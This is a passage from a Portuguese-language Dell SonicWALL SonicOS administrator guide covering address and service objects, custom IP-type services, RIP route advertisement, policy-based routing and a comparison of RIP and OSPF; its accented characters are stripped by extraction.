largura de banda declarando a largura de banda em suas interfaces WAN.
Nota O cone BWM ser exibido na tabela Regra de acesso indicando que o BWM est ativo e
fornecendo estatsticas. O acesso a todos os hosts de *.youtube.com usando qualquer
protocolo ser agora cumulativamente limitado a 2% da sua largura de banda total
disponvel para todas as sesses do usurio.
Objetos de endereos e IPv6

Para obter informaes completas sobre a implementao do IPv6 da Dell
SonicWALL, consulte IPv6 na pgina 1443.
Objetos de endereo IPv6 ou grupos de endereos podem ser adicionados da mesma forma
que os objetos de endereo IPv4. Na pgina Rede > Objetos de endereo, o boto de opo
Exibir verso do IP contm trs opes: Somente IPv4, Somente IPv6 ou IPv4 e IPv6.

Nota So suportados objetos de endereos do tipo Host, Intervalo e Rede. Os objetos de
endereos dinmicos para MAC e FQDN no so atualmente suportados para hosts IPv6.
As interfaces IPv4 definem um par de objetos de endereos padro (DAO) e um grupo de

objetos de endereos para cada interface. A regra bsica para DAO de IPv4 que cada
endereo IPv4 corresponde a 2 objetos de endereos: IP de interface e sub-rede de interface.
Existem tambm pares de grupos AO para IP de interfaces de zonas, sub-redes de zonas,
todos os IP de interfaces, todos os IP de gerenciamento de interfaces, etc.
A interface IPv6 prepara o mesmo conjunto DAO para cada interface. Uma vez que possvel
atribuir mltiplos IPv6 a uma interface, todos esses endereos podem ser adicionados,
editados e excludos dinamicamente. Por conseguinte, os DAO de IPv6 precisam ser criados
e excludos dinamicamente.
Para tratar disso, os DAO no so gerados dinamicamente para interfaces IPv6. So criados
somente DAO de interface limitados, o que resulta em suporte limitado para outro mdulo que
precise acessar DAO de interface.

Captulo 18
Configurar grupos de servios e objetos
de servios de rede
Rede > Servios

O SonicOS suporta um suporte de protocolo IP expandido para permitir que os usurios criem
servios e regras de acesso com base nesses protocolos. Consulte Protocolos suportados na
pgina 294 para obter uma lista de protocolos predefinidos. E consulte Adicionar servios de
tipo de IP personalizado na pgina 296 para adicionar protocolos IP especficos necessrios
para sua rede.
Os servios so usados pelo dispositivo de segurana Dell SonicWALL para configurar regras
de acesso de rede para permitir ou negar o trfego para a rede. O dispositivo de segurana
Dell SonicWALL inclui Servios padro. Os Servios padro so servios predefinidos que
no so editveis. E voc tambm pode criar Servios personalizados para configurar os
servios de firewall para atenderem aos seus requisitos de negcios especficos.
A seleo de Todos os servios em Ver estilo exibe Servios personalizados e Servios

padro.
Configurar grupos de servios e objetos de servios de rede | 293

Viso geral de servios padro
A visualizao Servios padro exibe os servios padro do dispositivo de segurana Dell
SonicWALL na tabela Servios e na tabela Grupos de servios. A tabela Grupos de servios
exibe clusters de vrios servios padro como um objeto de servio nico. Voc no pode
excluir ou editar esses servios predefinidos. A tabela Servios exibe os seguintes atributos
dos servios:
Nome o nome do servio.
Protocolo o protocolo do servio.
Incio de porta o nmero de porta inicial do servio.
Fim de porta o nmero de porta final do servio.
Configurar exibe os cones indisponveis Editar e Excluir (os servios padro
no podem ser editados ou excludos, voc precisar adicionar um novo servio para que
os cones Editar e Excluir fiquem disponveis).
Comentrios exibe para o grupo de servios os objetos de endereo de rede, objetos de
servio de firewall e regras de acesso de rede aplicveis de Fonte de pesquisa por, bem
como o tipo de grupo de aplicativos ou servios Grupos (membro de).
Os servios que se aplicam a aplicativos comuns so agrupados como Grupos de servios
padro. Esses grupos no podem ser alterados ou excludos. Se clicar em + esquerda da
entrada de Grupos de servios padro, sero exibidos todos os servios padro individuais
includos no grupo. Por exemplo, a entrada DNS (Servio de Nome) tem dois servios
rotulados como DNS (Servio de Nome) TCP para a porta 53 e DNS (Servio de Nome) UDP
para a porta 53. Essas vrias entradas com o mesmo nome so agrupadas e tratadas como
um nico servio. Os grupos de servios padro no podem ser editados ou excludos.
Lista de tarefas de configurao de servios personalizados

A lista a seguir fornece as tarefas de configurao para Servios personalizados:
Adicionar servios personalizados
Editar servios personalizados
Excluir servios personalizados
Adicionar grupos de servios personalizados
Editar grupos de servios personalizados
Excluir grupos de servios personalizados
Protocolos suportados
Esta seo fornece uma lista de protocolos IP predefinidos para servios personalizados:
ICMP (1) (Protocolo de mensagens de controle da Internet) Um protocolo TCP/IP usado
para enviar mensagens de erro e controle.
IGMP (2) (Protocolo de gerenciamento de grupos da Internet) O protocolo que controla
o gerenciamento de grupos de difuso seletiva em uma rede TCP/IP.
TCP (6) (Protocolo de controle de transmisso) A parte TCP de TCP/IP. O TCP um
protocolo de transporte em TCP/IP. O TCP garante que uma mensagem enviada com
preciso e na sua totalidade.
UDP (17) (Protocolo de datagramas de usurio) Um protocolo no conjunto de protocolos
TCP/IP que usado em vez de TCP quando no necessria uma entrega confivel.

GRE (47) (Encapsulamento de roteamento genrico) Um protocolo de encapsulamento
usado para encapsular uma ampla variedade de tipos de pacotes de protocolo dentro de
tneis IP, criando um link ponto a ponto virtual para firewalls ou dispositivos de roteamento
atravs de uma interligao de redes IP.
ESP (50) (Carga de segurana encapsulada) Um mtodo de encapsulamento de um
datagrama IP dentro de outro datagrama usado como um mtodo flexvel de transporte de
dados por IPsec.
AH (51) (Cabealho de autenticao) Um protocolo de segurana que oferece servios
opcionais antirretransmisso e autenticao de dados. O AH est embutido nos dados a
serem protegidos (um datagrama IP completo).
EIGRP (88) (Protocolo de roteamento de gateway interior aprimorado) Verso avanada
do IGRP. Fornece propriedades de convergncia superiores e eficincia operacional e
combina as vantagens de protocolos de estado de link com aquelas dos protocolos de
vetor de distncia.
OSPF (89) (Abrir o caminho mais curto primeiro) Um protocolo de roteamento que
determina o melhor caminho para rotear trfego IP atravs de uma rede TCP/IP com base
na distncia entre ns e diversos parmetros de qualidade. OSPF um protocolo de
gateway interior (IGP) que foi projetado para trabalhar em um sistema autnomo. Tambm
um protocolo de estado de link que fornece menos trfego de atualizao de roteador
para roteador do que o protocolo RIP (protocolo de vetor de distncia) que foi projetado
para substituir.
PIMSM (103) (Modo esparso de difuso seletiva independente de protocolo) Um dos dois
modos operacionais PIM (denso e esparso). O modo esparso de PIM tenta restringir a
distribuio de dados de modo que um nmero mnimo de roteadores na rede os receba.
Os pacotes so enviados somente se forem explicitamente solicitados no RP (ponto de
reunio). No modo esparso, os destinatrios so amplamente distribudos e a suposio
que as redes downstream no usaro necessariamente os datagramas que so enviados
para eles. O custo de uso do modo esparso sua dependncia na atualizao peridica
de mensagens de unio explcitas e sua necessidade de RPs.
L2TP (115) (Protocolo de encapsulamento de camada 2) Um protocolo que permite que
uma sesso PPP seja executada pela Internet. L2TP no inclui criptografia, mas o padro
usar IPsec para fornecer conexes de rede virtual privada (VPN) de usurios remotos
para a LAN corporativa.
Adicionar servios personalizados para tipos de servios predefinidos

Voc pode adicionar um servio personalizado para qualquer um dos tipos de servios
predefinidos:
Protocolo Nmero de IP
ICMP 1
TCP 6
UDP 17
GRE 47
IPsec ESP 50
IPsec AH 51
IGMP 2
EIGRP 88
OSPF 89

PIM SM 103
L2TP 115
Todos os servios personalizados que voc cria esto listados na tabela Servios
personalizados. Voc pode agrupar servios personalizados criando um Grupo de servios
personalizados para a imposio de polticas simplificada. Se um protocolo no estiver listado
na tabela Servios padro, voc pode adicion-lo tabela Servios personalizados clicando
em Adicionar.
Para adicionar servios personalizados aos tipos de servios predefinidos, execute as
seguintes etapas:
Etapa 1 Digite o nome do servio no campo Nome.

Etapa 2 Selecione o tipo de protocolo IP no menu suspenso Protocolo.
Etapa 3 Insira o intervalo de portas ou o subtipo de protocolo IP, dependendo da sua seleo de
protocolo IP:
Para protocolos TCP e UDP, especifique o Intervalo de portas. Voc no precisar
especificar um Subtipo.
Para protocolos ICMP, IGMP, OSPF e PIMSM, selecione os subtipos no menu
suspenso Subtipo.
Para os protocolos restantes, voc no precisar especificar um Intervalo de portas ou
um Subtipo.
Etapa 4 Clique em OK. O servio aparece na tabela Servios personalizados. Clique na caixa de
seleo Habilitar registro em log para desabilitar ou habilitar o registro das atividades do
servio.
Adicionar servios de tipo de IP personalizado

Usando somente os tipos de IP predefinidos, se o dispositivo de segurana encontrar trfego
de qualquer outro tipo de protocolo IP, ele ser descartado como no reconhecido. No entanto,
h uma grande lista em expanso de outros tipos IP registrados, como controlado pela IANA
(Internet Assigned Numbers Authority Autoridade de atribuio de nmeros na Internet):
http://www.iana.org/assignments/protocol-numbers, portanto, enquanto a prtica rgida de
descarte de trfego de tipo IP menos comum (no reconhecido) segura, era funcionalmente
restritiva.
O SonicOS, com o suporte para Objetos de servio de tipo IP personalizado, permite que um
administrador construa Objetos de servio representando qualquer tipo IP, permitindo que
regras de acesso do firewall sejam gravadas para reconhecer e controlar trfego de IPv4 de
qualquer tipo.
Nota O servio genrico Qualquer no manipular Objetos de servio do tipo IP personalizado. Por
outras palavras, a definio de um objeto de servio do tipo IP personalizado para o Tipo IP 126
no permitir que o trfego de Tipo IP 126 passe pela regra de permisso LAN > WAN.
Ser necessrio criar uma Regra de acesso especificamente contendo o Objeto de servio do
tipo IP personalizado para fornecer seu reconhecimento e sua manipulao, como mostrado
abaixo.

Exemplo de configurao
Suponha que um administrador precisava permitir RSVP (Protocolo de reserva de recursos
Tipo IP 46) e SRP (Protocolo de rdio Spectralink Tipo IP 119) de todos os clientes na
zona de WLAN (sub-redes de WLAN) para um servidor na zona de LAN (por exemplo,
10.50.165.26). O administrador poderia definir Objetos de servios do tipo IP personalizado
para lidar com esses dois servios:
Etapa 1 Na pgina Rede > Servios, clique no link Acessar objetos de servio na parte superior
direita da pgina para ir at a seo Servios.
Etapa 3 Atribua nomes aos Objetos de servios em conformidade.
Etapa 4 Selecione Tipo IP personalizado na lista suspensa Protocolo.
Etapa 5 Insira o nmero de protocolo para o Tipo IP personalizado. Os intervalos de portas no so
definveis para ou aplicveis a tipos IP personalizados.
Nota No sero permitidas tentativas para definir um Objeto de servio do tipo IP personalizado
para um tipo IP predefinido e resultaro em uma mensagem de erro.
Etapa 7 Na pgina Rede > Servios, seo Grupo de servios, selecione Adicionar grupo.
Etapa 8 Adicione um Grupo de servios composto pelos Servios de tipos IP personalizados.
Etapa 9 Em Firewall > Regras de acesso > WLAN > LAN, selecione Adicionar.
Etapa 10 Defina uma Regra de acesso permitindo myServices de Sub-redes de WLAN para o objeto
de endereo 10.50.165.26.

Nota Selecione suas zonas, seus servios e objetos de endereos adequadamente. Poder ser
necessrio criar uma Regra de acesso para trfego bidirecional; por exemplo, uma Regra
de acesso adicional da LAN > WLAN permitindo myServices de 10.50.165.26 para Sub-
redes de WLAN.

O trfego de protocolo IP 46 e 119 ser agora reconhecido e ser permitida a passagem de
Sub-redes de WLAN para 10.50.165.26.
Editar servios personalizados

Clique no cone Editar em Configurar para editar o servio na janela Editar servio que
inclui as mesmas configuraes que a janela Adicionar servio.
Excluir servios personalizados

Clique no cone Excluir para excluir um servio personalizado individual. Voc pode
excluir todos os servios personalizados clicando no boto Excluir.
Adicionar um grupo de servios personalizados

Voc pode adicionar servios personalizados e, em seguida, criar grupos de servios,
incluindo servios padro, para aplicar as mesmas polticas. Por exemplo, voc pode permitir
o trfego de SMTP e POP3 somente durante determinadas horas ou determinados dias da
semana adicionando os dois servios como um Grupo de servio personalizado. Para criar um
Grupo de servios personalizados, clique em Adicionar grupo.

Etapa 1 Digite um nome para o grupo personalizado no campo de nome.
Etapa 2 Selecione servios individuais da lista na coluna esquerda. Voc tambm pode selecionar
vrios servios pressionando a tecla Ctrl e clicando nos servios.
Etapa 3 Clique em -> para adicionar os servios ao grupo.
Etapa 4 Para remover servios do grupo, selecione servios individuais da lista na coluna direita.
Voc tambm pode selecionar vrios servios pressionando a tecla Ctrl no seu teclado e
clicando nos servios.
Etapa 5 Clique em <- para remover os servios.
Etapa 6 Quando tiver terminado, clique em OK para adicionar o grupo aos Grupos de servios
personalizados.
Se clicar em + esquerda de um nome de Grupo de servio personalizado, ser expandida a
exibio para mostrar todos os servios personalizados individuais, servios padro e grupos
de servios personalizados includos na entrada Grupo de servios personalizados.
Editar grupos de servios personalizados

Clique no cone Editar em Configurar para editar o grupo de servio personalizado na
janela Editar grupo de servios que inclui as mesmas configuraes que a janela Adicionar
grupo de servios.
Excluir grupos de servios personalizados

Clique no cone Excluir para excluir a entrada de grupo de servios personalizados
individuais. Voc pode excluir todos os grupos de servios personalizados clicando no boto
Excluir.

Captulo 19
Configurar anncios de rota
e polticas de rota
Rede > Roteamento

Se voc tiver roteadores em suas interfaces, voc pode configurar rotas estticas no firewall,
na pgina Rede > Roteamento. Voc pode criar polticas de rota estticas que criam entradas
de roteamento estticas que tomam decises com base em endereo de origem, mscara de
rede de origem, endereo de destino, mscara de rede de destino, servio, interface, gateway
e mtrica. Este recurso permite o controle total do encaminhamento com base em um grande
nmero de variveis definidas pelo usurio.
Anncio de rota na pgina 302
Polticas de rota na pgina 304
Servios de roteamento avanado OSPF e RIP na pgina 309
Configurando os servios de roteamento avanado de RIP e OSPF na pgina 312
Configurar roteamento avanado do BGP na pgina 320
Roteamento com base em poltica e no IPv6 na pgina 321
Configurar anncios de rota e polticas de rota | 301

Anncio de rota
O Dispositivo de Segurana Dell SonicWALL usa RIPv1 ou RIPv2 para anunciar suas rotas
estticas e dinmicas a outros roteadores na rede. As alteraes no status de tneis de VPN
entre o firewall e gateways VPN remotos tambm se refletem nos anncios de RIPv2. Escolha
entre RIPv1 ou RIPv2 com base nos recursos ou na configurao do seu roteador. RIPv1
uma verso anterior do protocolo que possui menos recursos e tambm envia pacotes via
difuso em vez de difuso seletiva. Os pacotes de RIPv2 so compatveis com verses
anteriores e podem ser aceitos por algumas implementaes de RIPv1 que fornecem uma
opo de escuta para pacotes de difuso seletiva. O RIPv2 habilitado (difuso) seleciona
pacotes de difuso em vez de pacotes de difuso seletiva para redes heterogneas com uma
mistura de roteadores RIPv1 e RIPv2.

Configurao de anncio de rota
Para habilitar o Anncio de rota para uma interface de rede, realize as seguintes etapas:
Etapa 1 Clique no cone Editar na coluna Configurar da interface. A janela Configurao de

anncio de rota exibida.
Etapa 2 Selecione um dos seguintes tipos de anncios RIP:

Desabilitado desabilita anncios RIP.
RIPv1 Habilitado RIPv1 a primeira verso do Protocolo de informaes de
roteamento.
RIPv2 habilitado (difuso seletiva) para enviar anncios de rota usando difuso
seletiva (um pacote de dados nico para ns especficos na rede).
RIPv2 habilitado (difuso) para enviar anncios de rota usando difuso (um pacote
de dados nico para todos os ns na rede).
Etapa 3 No menu Anunciar rota padro, selecione Nunca, Quando a WAN estiver ativa ou Sempre.
Etapa 4 Habilite Anunciar rotas estticas se voc tiver rotas estticas configuradas no firewall para
exclu-las de Anncio de rota.
Etapa 5 Habilite Anunciar redes de VPN remotas se voc desejar anunciar redes de VPN.
Etapa 6 Insira um valor em segundos entre anncios transmitidos atravs de uma rede no campo
Tempo de damp de alterao de rota (segundos). O valor padro 30 segundos. Um valor
inferior corresponde a um volume mais alto de trfego de difuso na rede. A configurao
Tempo de damp de alterao de rota (segundos) define o atraso entre a hora em que um

tnel de VPN altera o estado (ativo ou inativo) e a hora em que a alterao anunciada com
RIP. O atraso, em segundos, evita anncios de rota ambguos enviados como resultado de uma
alterao temporria no status de tnel de VPN.
Etapa 7 Insira o nmero de anncios que uma rota excluda transmite at parar no campo Anncios
de rota excludos (099). O valor padro 1.
Etapa 8 Insira um valor de 1 a 15 no campo Mtrica de rota (115). Este o nmero de vezes que um
pacote toca um roteador a partir do endereo IP de origem para o endereo IP de destino.
Etapa 9 Se RIPv2 for selecionado no menu Anncios de rota, voc pode digitar um valor para a marca
de rota no campo Marca de rota RIPv2 (4 dgitos hexa). Esse valor depende da
implementao e fornece um mecanismo para que roteadores classifiquem os criadores de
anncios de RIPv2. Este campo opcional.
Etapa 10 Se voc desejar habilitar a autenticao RIPv2, selecione uma das seguintes opes no menu
Autenticao RIPv2:
Definido pelo usurio insira 4 dgitos hexa no campo Tipo de autenticao (4 dgitos
hexa). Insira 32 dgitos hexa no campo Dados de autenticao (32 dgitos hexa).
Senha cleartext digite uma senha no campo Senha de autenticao (mx. 16
caracteres). Pode ser usado um mximo de 16 caracteres para definir uma senha.
Resumo de MD5 insira um valor numrico de 0 a 255 no campo Id de chave de
autenticao (0255). Digite um valor de 32 dgitos hexa no campo Chave de
autenticao (32 dgitos hexa) ou use a chave gerada.
Polticas de rota
O SonicOS fornece um roteamento com base em poltica (PBR) para oferecer recursos de
tratamento de trfego mais flexveis e granulares. As sees a seguir descrevem o PBR:
Roteamento com base em poltica na pgina 304
Tabela de polticas de rota na pgina 305
Configurao de rota esttica na pgina 306
Configurao de roteamento com base em poltica habilitado por investigao na
pgina 307
Um exemplo de poltica de rota na pgina 308
Roteamento com base em poltica

Uma entrada de roteamento esttico simples especifica como tratar do trfego que
corresponde a determinados critrios, como endereo de destino, mscara de destino,
gateway para encaminhar trfego, a interface onde est localizado o gateway e a mtrica de
rota. Esse mtodo de roteamento esttico atende aos requisitos mais estticos, mas est
limitado a encaminhamento baseado somente em endereamento de destino.
O roteamento com base em poltica (PBR) permite que voc crie rotas estticas estendidas
para oferecer recursos de tratamento de trfego mais flexveis e granulares. O PBR do
SonicOS permite a correspondncia com base em endereo de origem, mscara de rede de
origem, endereo de destino, mscara de rede de destino, servio, interface e mtrica. Esse
mtodo de roteamento permite controle total do encaminhamento com base em um grande
nmero de variveis definidas pelo usurio.

Uma mtrica um custo ponderado atribudo a rotas estticas e dinmicas. As mtricas tm
um valor entre 0 e 255. As mtricas mais baixas so consideradas melhores e tm prioridade
sobre custos superiores. O SonicOS cumpre os valores mtricos definidos pela Cisco para
interfaces diretamente conectadas, rotas codificadas estaticamente e todos os protocolos de
roteamento de IP dinmico.
Valor mtrico Descrio

1 Rota esttica
5 Resumo EIGRP
20 BGP externo
90 EIGRP
100 IGRP
110 OSPF
115 IS-IS
120 RIP
140 EGP
170 EIGRP externo
Interno BGP
Tabela de polticas de rota

Voc pode alterar o modo de exibio de suas polticas de rota na tabela Polticas de rota
selecionando uma das configuraes de exibio no menu Ver estilo.
Todas as polticas exibe todas as polticas de roteamento, incluindo Polticas

personalizadas e Polticas padro. Inicialmente, somente as Polticas padro so exibidas
na tabela Polticas de rota quando voc selecionar Todas as polticas no menu Ver estilo.
A tabela Polticas de rota fornece fcil paginao para a visualizao de um grande nmero
de polticas de roteamento. Voc pode navegar em um grande nmero de polticas de
roteamento listadas na tabela Polticas de rota usando a barra de controle de navegao
localizada na parte superior direita da tabela Polticas de rota. A barra de controle de
navegao inclui quatro botes. O boto mais esquerda exibe a primeira pgina da tabela.
O boto mais direita exibe a ltima pgina. Os botes de seta interiores para a esquerda e
para a direita movem a pgina anterior ou seguinte, respectivamente.

# Nome) no campo Itens para avanar para uma poltica de roteamento especfica. A
configurao de tabela padro exibe 50 entradas por pgina. Voc pode alterar esse nmero
padro de entradas de tabelas na pgina Sistema > Administrao.
Configurao de rota esttica

No SonicOS, uma rota esttica configurada por meio de uma poltica de rota bsica. Para
configurar uma rota esttica, execute as seguintes etapas:
Etapa 1 Role para o fim da pgina Rede > Roteamento e clique no boto Adicionar. A janela
Adicionar poltica de rota exibida.
Etapa 2 No menu Origem, selecione o objeto de endereo de origem para a rota esttica ou selecione
Criar novo objeto de endereo para criar dinamicamente um novo objeto de endereo.
Etapa 3 No menu Destino, selecione o objeto de endereo de destino.
Etapa 4 No menu Servio, selecione um objeto de servio. Para uma rota esttica genrica que
permite todos os tipos de trfego, basta selecionar Qualquer.

Etapa 5 No menu Gateway, selecione o objeto de endereo do gateway a ser usado para a rota.
Etapa 6 No menu Interface, selecione a interface a ser usada para a rota.
Etapa 7 Insira a Mtrica da rota. A mtrica padro de rotas estticas um. Para obter mais
informaes sobre mtricas, consulte Roteamento com base em poltica na pgina 304.
Etapa 8 Insira o Comentrio da rota. Este campo permite inserir um comentrio descritivo para a nova
poltica de rota esttica.
Etapa 9 (Opcional) Marque a caixa de seleo Desabilite a rota quando a interface estiver
desconectada para que a rota seja automaticamente desabilitada quando a interface estiver
desconectada.
Etapa 10 (Opcional) A opo Permitir que o caminho VPN tenha prioridade permite que voc crie uma
rota de backup para um tnel de VPN. Por padro, as rotas estticas tm uma mtrica de um
e prevalecem em relao ao trfego VPN. A opo Permitir que o caminho VPN tenha
prioridade atribui precedncia ao mesmo objeto de endereo de destino relativamente rota
para trfego VPN. Tal resulta no seguinte comportamento:
Quando um tnel de VPN est ativo: as rotas estticas que correspondem ao objeto de
endereo de destino do tnel de VPN so desabilitadas automaticamente se a opo
Permitir que o caminho VPN tenha prioridade estiver habilitada. Todo o trfego
roteado atravs do tnel de VPN para o objeto de endereo de destino.
Quando um tnel de VPN fica inativo: as rotas estticas que correspondem ao objeto
de endereo de destino do tnel de VPN so habilitadas automaticamente. Todo o
trfego para o objeto de endereo de destino roteado atravs das rotas estticas.
Etapa 11 As opes Investigar, Desabilitar rota quando a investigao for bem-sucedida e O
estado padro da investigao ATIVO so utilizadas para configurar roteamento com base
em poltica habilitado por investigao. Consulte Configurao de roteamento com base em
poltica habilitado por investigao na pgina 307 para obter mais informaes sobre a
respectiva configurao.
Etapa 12 Clique em OK para adicionar a rota.
Configurao de roteamento com base em poltica habilitado por investigao

Ao configurar uma rota esttica, voc pode opcionalmente configurar uma poltica de
Monitoramento de rede para a rota. Quando for usada uma poltica de monitoramento de rede,
a rota esttica ser dinamicamente desabilitada ou habilitada, com base no estado da
investigao da poltica.
Etapa 1 Configure a rota esttica conforme descrito em Configurao de rota esttica na pgina 306.
Etapa 2 No menu suspenso Investigar, selecione o objeto de monitoramento de rede apropriado ou
selecione Criar novo objeto de monitoramento de rede... para criar um novo objeto
dinamicamente. Para obter mais informaes, consulte Rede > Monitoramento de rede na
pgina 399.
Etapa 3 As configuraes tpicas no marcaro a caixa de seleo Desabilitar rota quando a
investigao for bem-sucedida, pois os administradores tpicos desejaro desabilitar uma
rota quando uma investigao ao destino da rota falhar. Esta opo fornecida para atribuir
maior flexibilidade aos administradores na definio de rotas e investigaes.
Etapa 4 Selecione O estado padro da investigao ATIVO para que a rota considere a
investigao bem-sucedida (ou seja, no estado "ATIVO") quando a poltica de Monitoramento
de rede conectada estiver no estado "DESCONHECIDO". Isso til para controlar o

comportamento com base na investigao quando uma unidade de um par de Alta
disponibilidade passa de "OCIOSO" para "ATIVO", pois essa transio define todos os estados
de poltica do Monitoramento de rede como "DESCONHECIDO".
Etapa 5 Clique em OK para aplicar a configurao.
Um exemplo de poltica de rota

O exemplo a seguir orienta voc atravs da criao de uma poltica de rota para duas
interfaces de WAN ativas em simultneo. Para esse exemplo, uma interface de WAN
secundria precisa ser configurada na interface X3 e definida com as configuraes de seu
ISP. Em seguida, configure o dispositivo de segurana para balanceamento de carga
marcando a opo Habilitar balanceamento de carga na pgina Rede > Failover e LB de
WAN. Para esse exemplo, escolha Round-Robin por conexo como o mtodo de
balanceamento de carga na pgina Rede > Failover e LB de WAN. Clique em Aceitar para
salvar suas alteraes na pgina Rede > Failover e LB de WAN.
Etapa 1 Clique no boto Adicionar na tabela Polticas de rota. A janela Adicionar poltica de rota
exibida.
Etapa 2 Crie uma poltica de roteamento que direcione todas as origens de Sub-rede de LAN para os
destinos Qualquer do servio HTTP fora do Gateway padro X1 atravs da interface X1
selecionando essas configuraes nos menus Origem, Destino, Servio, Gateway e
Interface, respectivamente. Use o padro 1 no campo Mtrica e digite forar http para fora
primrio no campo Comentrio. Clique em OK.
Etapa 3 Crie uma segunda poltica de roteamento que direcione todas as origens de Sub-rede de LAN
para os destinos Qualquer do servio Telnet fora do Gateway padro X3 atravs da interface
X3 selecionando essas configuraes nos menus Origem, Destino, Servio, Gateway e
Interface, respectivamente. Use o padro 1 no campo Mtrica e digite forar telnet para fora
backup no campo Comentrio. Clique em OK.
Nota No habilite a opo Permitir que o caminho VPN tenha prioridade para essas polticas
de roteamento. A opo Permitir que o caminho VPN tenha prioridade atribui
precedncia ao mesmo objeto de endereo de destino relativamente rota para trfego
VPN. Esta opo usada para configurar rotas estticas como backups para tneis de VPN.
Para obter mais informaes, consulte Configurao de rota esttica na pgina 306.
Essas duas rotas baseadas em polticas foram todas as origens da sub-rede da LAN a sarem
sempre da WAN primria ao usar qualquer aplicativo baseado em HTTP e foram todas as
origens da sub-rede da LAN a sarem sempre da WAN de backup ao usar qualquer aplicativo
baseado em Telnet.
Para testar a rota baseada em polticas HTTP, acesse os sites pblicos
http://www.whatismyip.com e http://whatismyip.everdot.org em um computador conectado
interface de LAN. Os dois sites exibem o endereo IP da interface de WAN primria e no da
interface de WAN secundria.
Para testar a rota baseada em polticas Telnet, aplique telnet a route-server.exodus.net e,
quando estiver conectado, execute o comando who. Ele exibe o endereo IP (ou FQDN
resolvido) do endereo IP de WAN da interface de WAN secundria e no a interface de WAN
primria.

Servios de roteamento avanado OSPF e RIP
Alm de anunciar de RIP e roteamento com base em poltica, o SonicOS oferece a opo de
habilitao de Servios de roteamento avanado (ARS). Os servios de roteamento avanado
oferecem suporte completo de anncio e escuta para os Protocolos de informaes de
roteamento (RIPv1 RFC1058) e (RIPv2 RFC2453) e Abrir o caminho mais curto primeiro
(OSPFv2 RFC2328). O servio de roteamento avanado s deve ser habilitado por esses
ambientes que exigem suporte para um ou para os dois protocolos de roteamento dinmico.
RIP e OSPF so protocolos de gateway interior (IGP) que so amplamente usados por redes
de vrios tamanhos para automatizar o processo de distribuio de rota. RIP geralmente
usado em redes menores, enquanto OSPF usado por redes maiores, embora o tamanho da
rede no deva ser o nico fator usado para determinar a adequao de um protocolo
relativamente a outro. Os fatores velocidade da rede, requisitos de interoperabilidade e
complexidade geral relativa, por exemplo, devem tambm ser considerados. RIPv1 e RIPv2
so suportados por ARS, sendo as maiores diferenas entre os dois o fato de RIPv2 suportar
VLSM (Variable Length Subnet Masks Mscaras de sub-rede de comprimento varivel),
autenticao e atualizaes de roteamento. A tabela a seguir ilustra as principais diferenas
entre RIPv1, RIPv2 e OSPFv2:
RIPv1 RIPv2 OSPFv2

Mtricas de protocolo Vetor de distncia Vetor de distncia Estado do link
Saltos mximos 15 15 Ilimitado
Atualizaes da Difuso de tabela Difuso ou difuso Difuses seletivas de
tabela de roteamento completa seletiva de tabela anncio de estado do link,
periodicamente, completa acionadas por alteraes,
convergncia mais periodicamente, convergncia rpida
lenta convergncia mais
lenta
Tamanhos de sub- Somente suporte de Somente com base VLSM
rede suportados sub-redes baseadas em classe
em classe (a/b/c)
Topologia de sistema Indivisvel e simples Indivisvel e simples Com base em rea,
autnomo permitindo agregao e
segmentao
Tipo de protocolo protocolos de vetor de distncia, como mtrica de roteamento

baseada em RIP exclusivamente em contagens de saltos, enquanto os protocolos de
estado de Link, como OSPF, consideram o estado do link ao determinar mtricas. Por
exemplo, o OSPF determina mtricas de interface dividindo sua largura de banda de

referncia (100 mbits por padro) pela velocidade da interface: quanto mais rpido for o
link, menor ser o custo e mais prefervel ser o caminho. Considere a seguinte rede de
exemplo:
Na rede de exemplo acima, se o Host A desejasse alcanar o Host B, com RIP, a rota de
custo mais baixo seria do Roteador A para o Roteador B, atravs do link relativamente
lento de 64 kbps. Com OSPF, o custo do Roteador A para o Roteador B seria 1562,
enquanto o custo do Roteador A para o Roteador C para o Roteador D para o Roteador B
seria 364, tornando-a a rota preferencial.
Saltos mximos o RIP impe uma contagem de saltos de 15 para ajudar a evitar loops
de roteamento que podem ocorrer quando so difundidas informaes de roteamento no
confiveis (por exemplo, obsoletas) e propagadas atravs de uma rede devido a erros de
configurao ou a convergncia lenta. Considere que o link entre o Roteador D e o
Roteador E falhou no diagrama acima e no existiam protees em vigor:
As informaes de roteamento do Roteador A informam que possvel alcanar a
Rede E por meio do Roteador B ou do Roteador C com uma mtrica de 3.
Quando o link entre o Roteador D e o Roteador E falhar e o Roteador A difundir suas
informaes de roteamento, o Roteador B e o Roteador C determinam que eles
conseguem alcanar a Rede E por meio de um Roteador A com uma mtrica de 4.
O Roteador B e o Roteador C difundem essas informaes e elas so recebidas pelo
Roteador D que determina que possvel alcanar a Rede E por meio do Roteador B
ou do Roteador C com uma mtrica de 5.
Este loop continua at a contagem de saltos de 16 (infinito) ser atingida.
Outras medidas contra esse tipo de situao so tambm normalmente empregadas
pelo RIP, incluindo:
Omisso de rotas um mecanismo preventivo onde as informaes de roteamento
aprendidas atravs de uma interface no so enviadas de volta pela mesma interface. Isso
geralmente funciona bem em links de difuso, mas no em links de no difuso como
Frame Relay, onde um nico link pode geralmente ser usado para alcanar dois sistemas
autnomos separados.
Reverso invlida tambm conhecida como envenenamento de rota, uma extenso da
omisso de rotas em que uma rede anunciada com uma mtrica de 16 (inalcanvel),
ajudando a garantir que rotas alternativas incorretas no so propagadas.
O OSPF no tem de impor um limite de contagem de saltos, pois ele no anuncia tabelas
de roteamento inteiras, em vez disso, ele geralmente envia apenas atualizaes de estado
de link quando ocorrem alteraes. Isso uma vantagem significativa em redes maiores,
pois converge mais rapidamente, produz menos do trfego de atualizao e suporta um
nmero ilimitado de saltos.

Atualizaes da tabela de roteamento conforme mencionado acima, a prtica de envio
de uma tabela de roteamento inteira apresenta problemas de convergncias mais lentas,
maior utilizao de largura de banda e maior potencial de informaes de roteamento
obsoletas. O RIPv1 transmite sua tabela de roteamento inteira em um intervalo prescrito
(geralmente a cada 30 segundos), o RIPv2 pode transmitir ou difundir seletivamente e as
difuses seletivas do OSPF conectam apenas atualizaes de estado sempre que ocorrer
uma alterao na malha da rede. O OSPF tem uma outra vantagem de uso de roteadores
designados (DR) na formao de adjacncias em redes de acesso mltiplo (mais
informaes sobre esses conceitos posteriormente) para que as atualizaes no
precisem ser enviadas para a rede inteira.
Tamanhos de sub-redes suportados o RIPv1 foi implementado pela primeira vez
quando as redes eram estritamente de classe A, classe B e classe C (e posterior D e E):
Classe A 1.0.0.0 a 126.0.0.0 (0.0.0.0 e 127.0.0.0 so reservadas)
Bit mais esquerda 0; 7 bits de rede; 24 bits de host
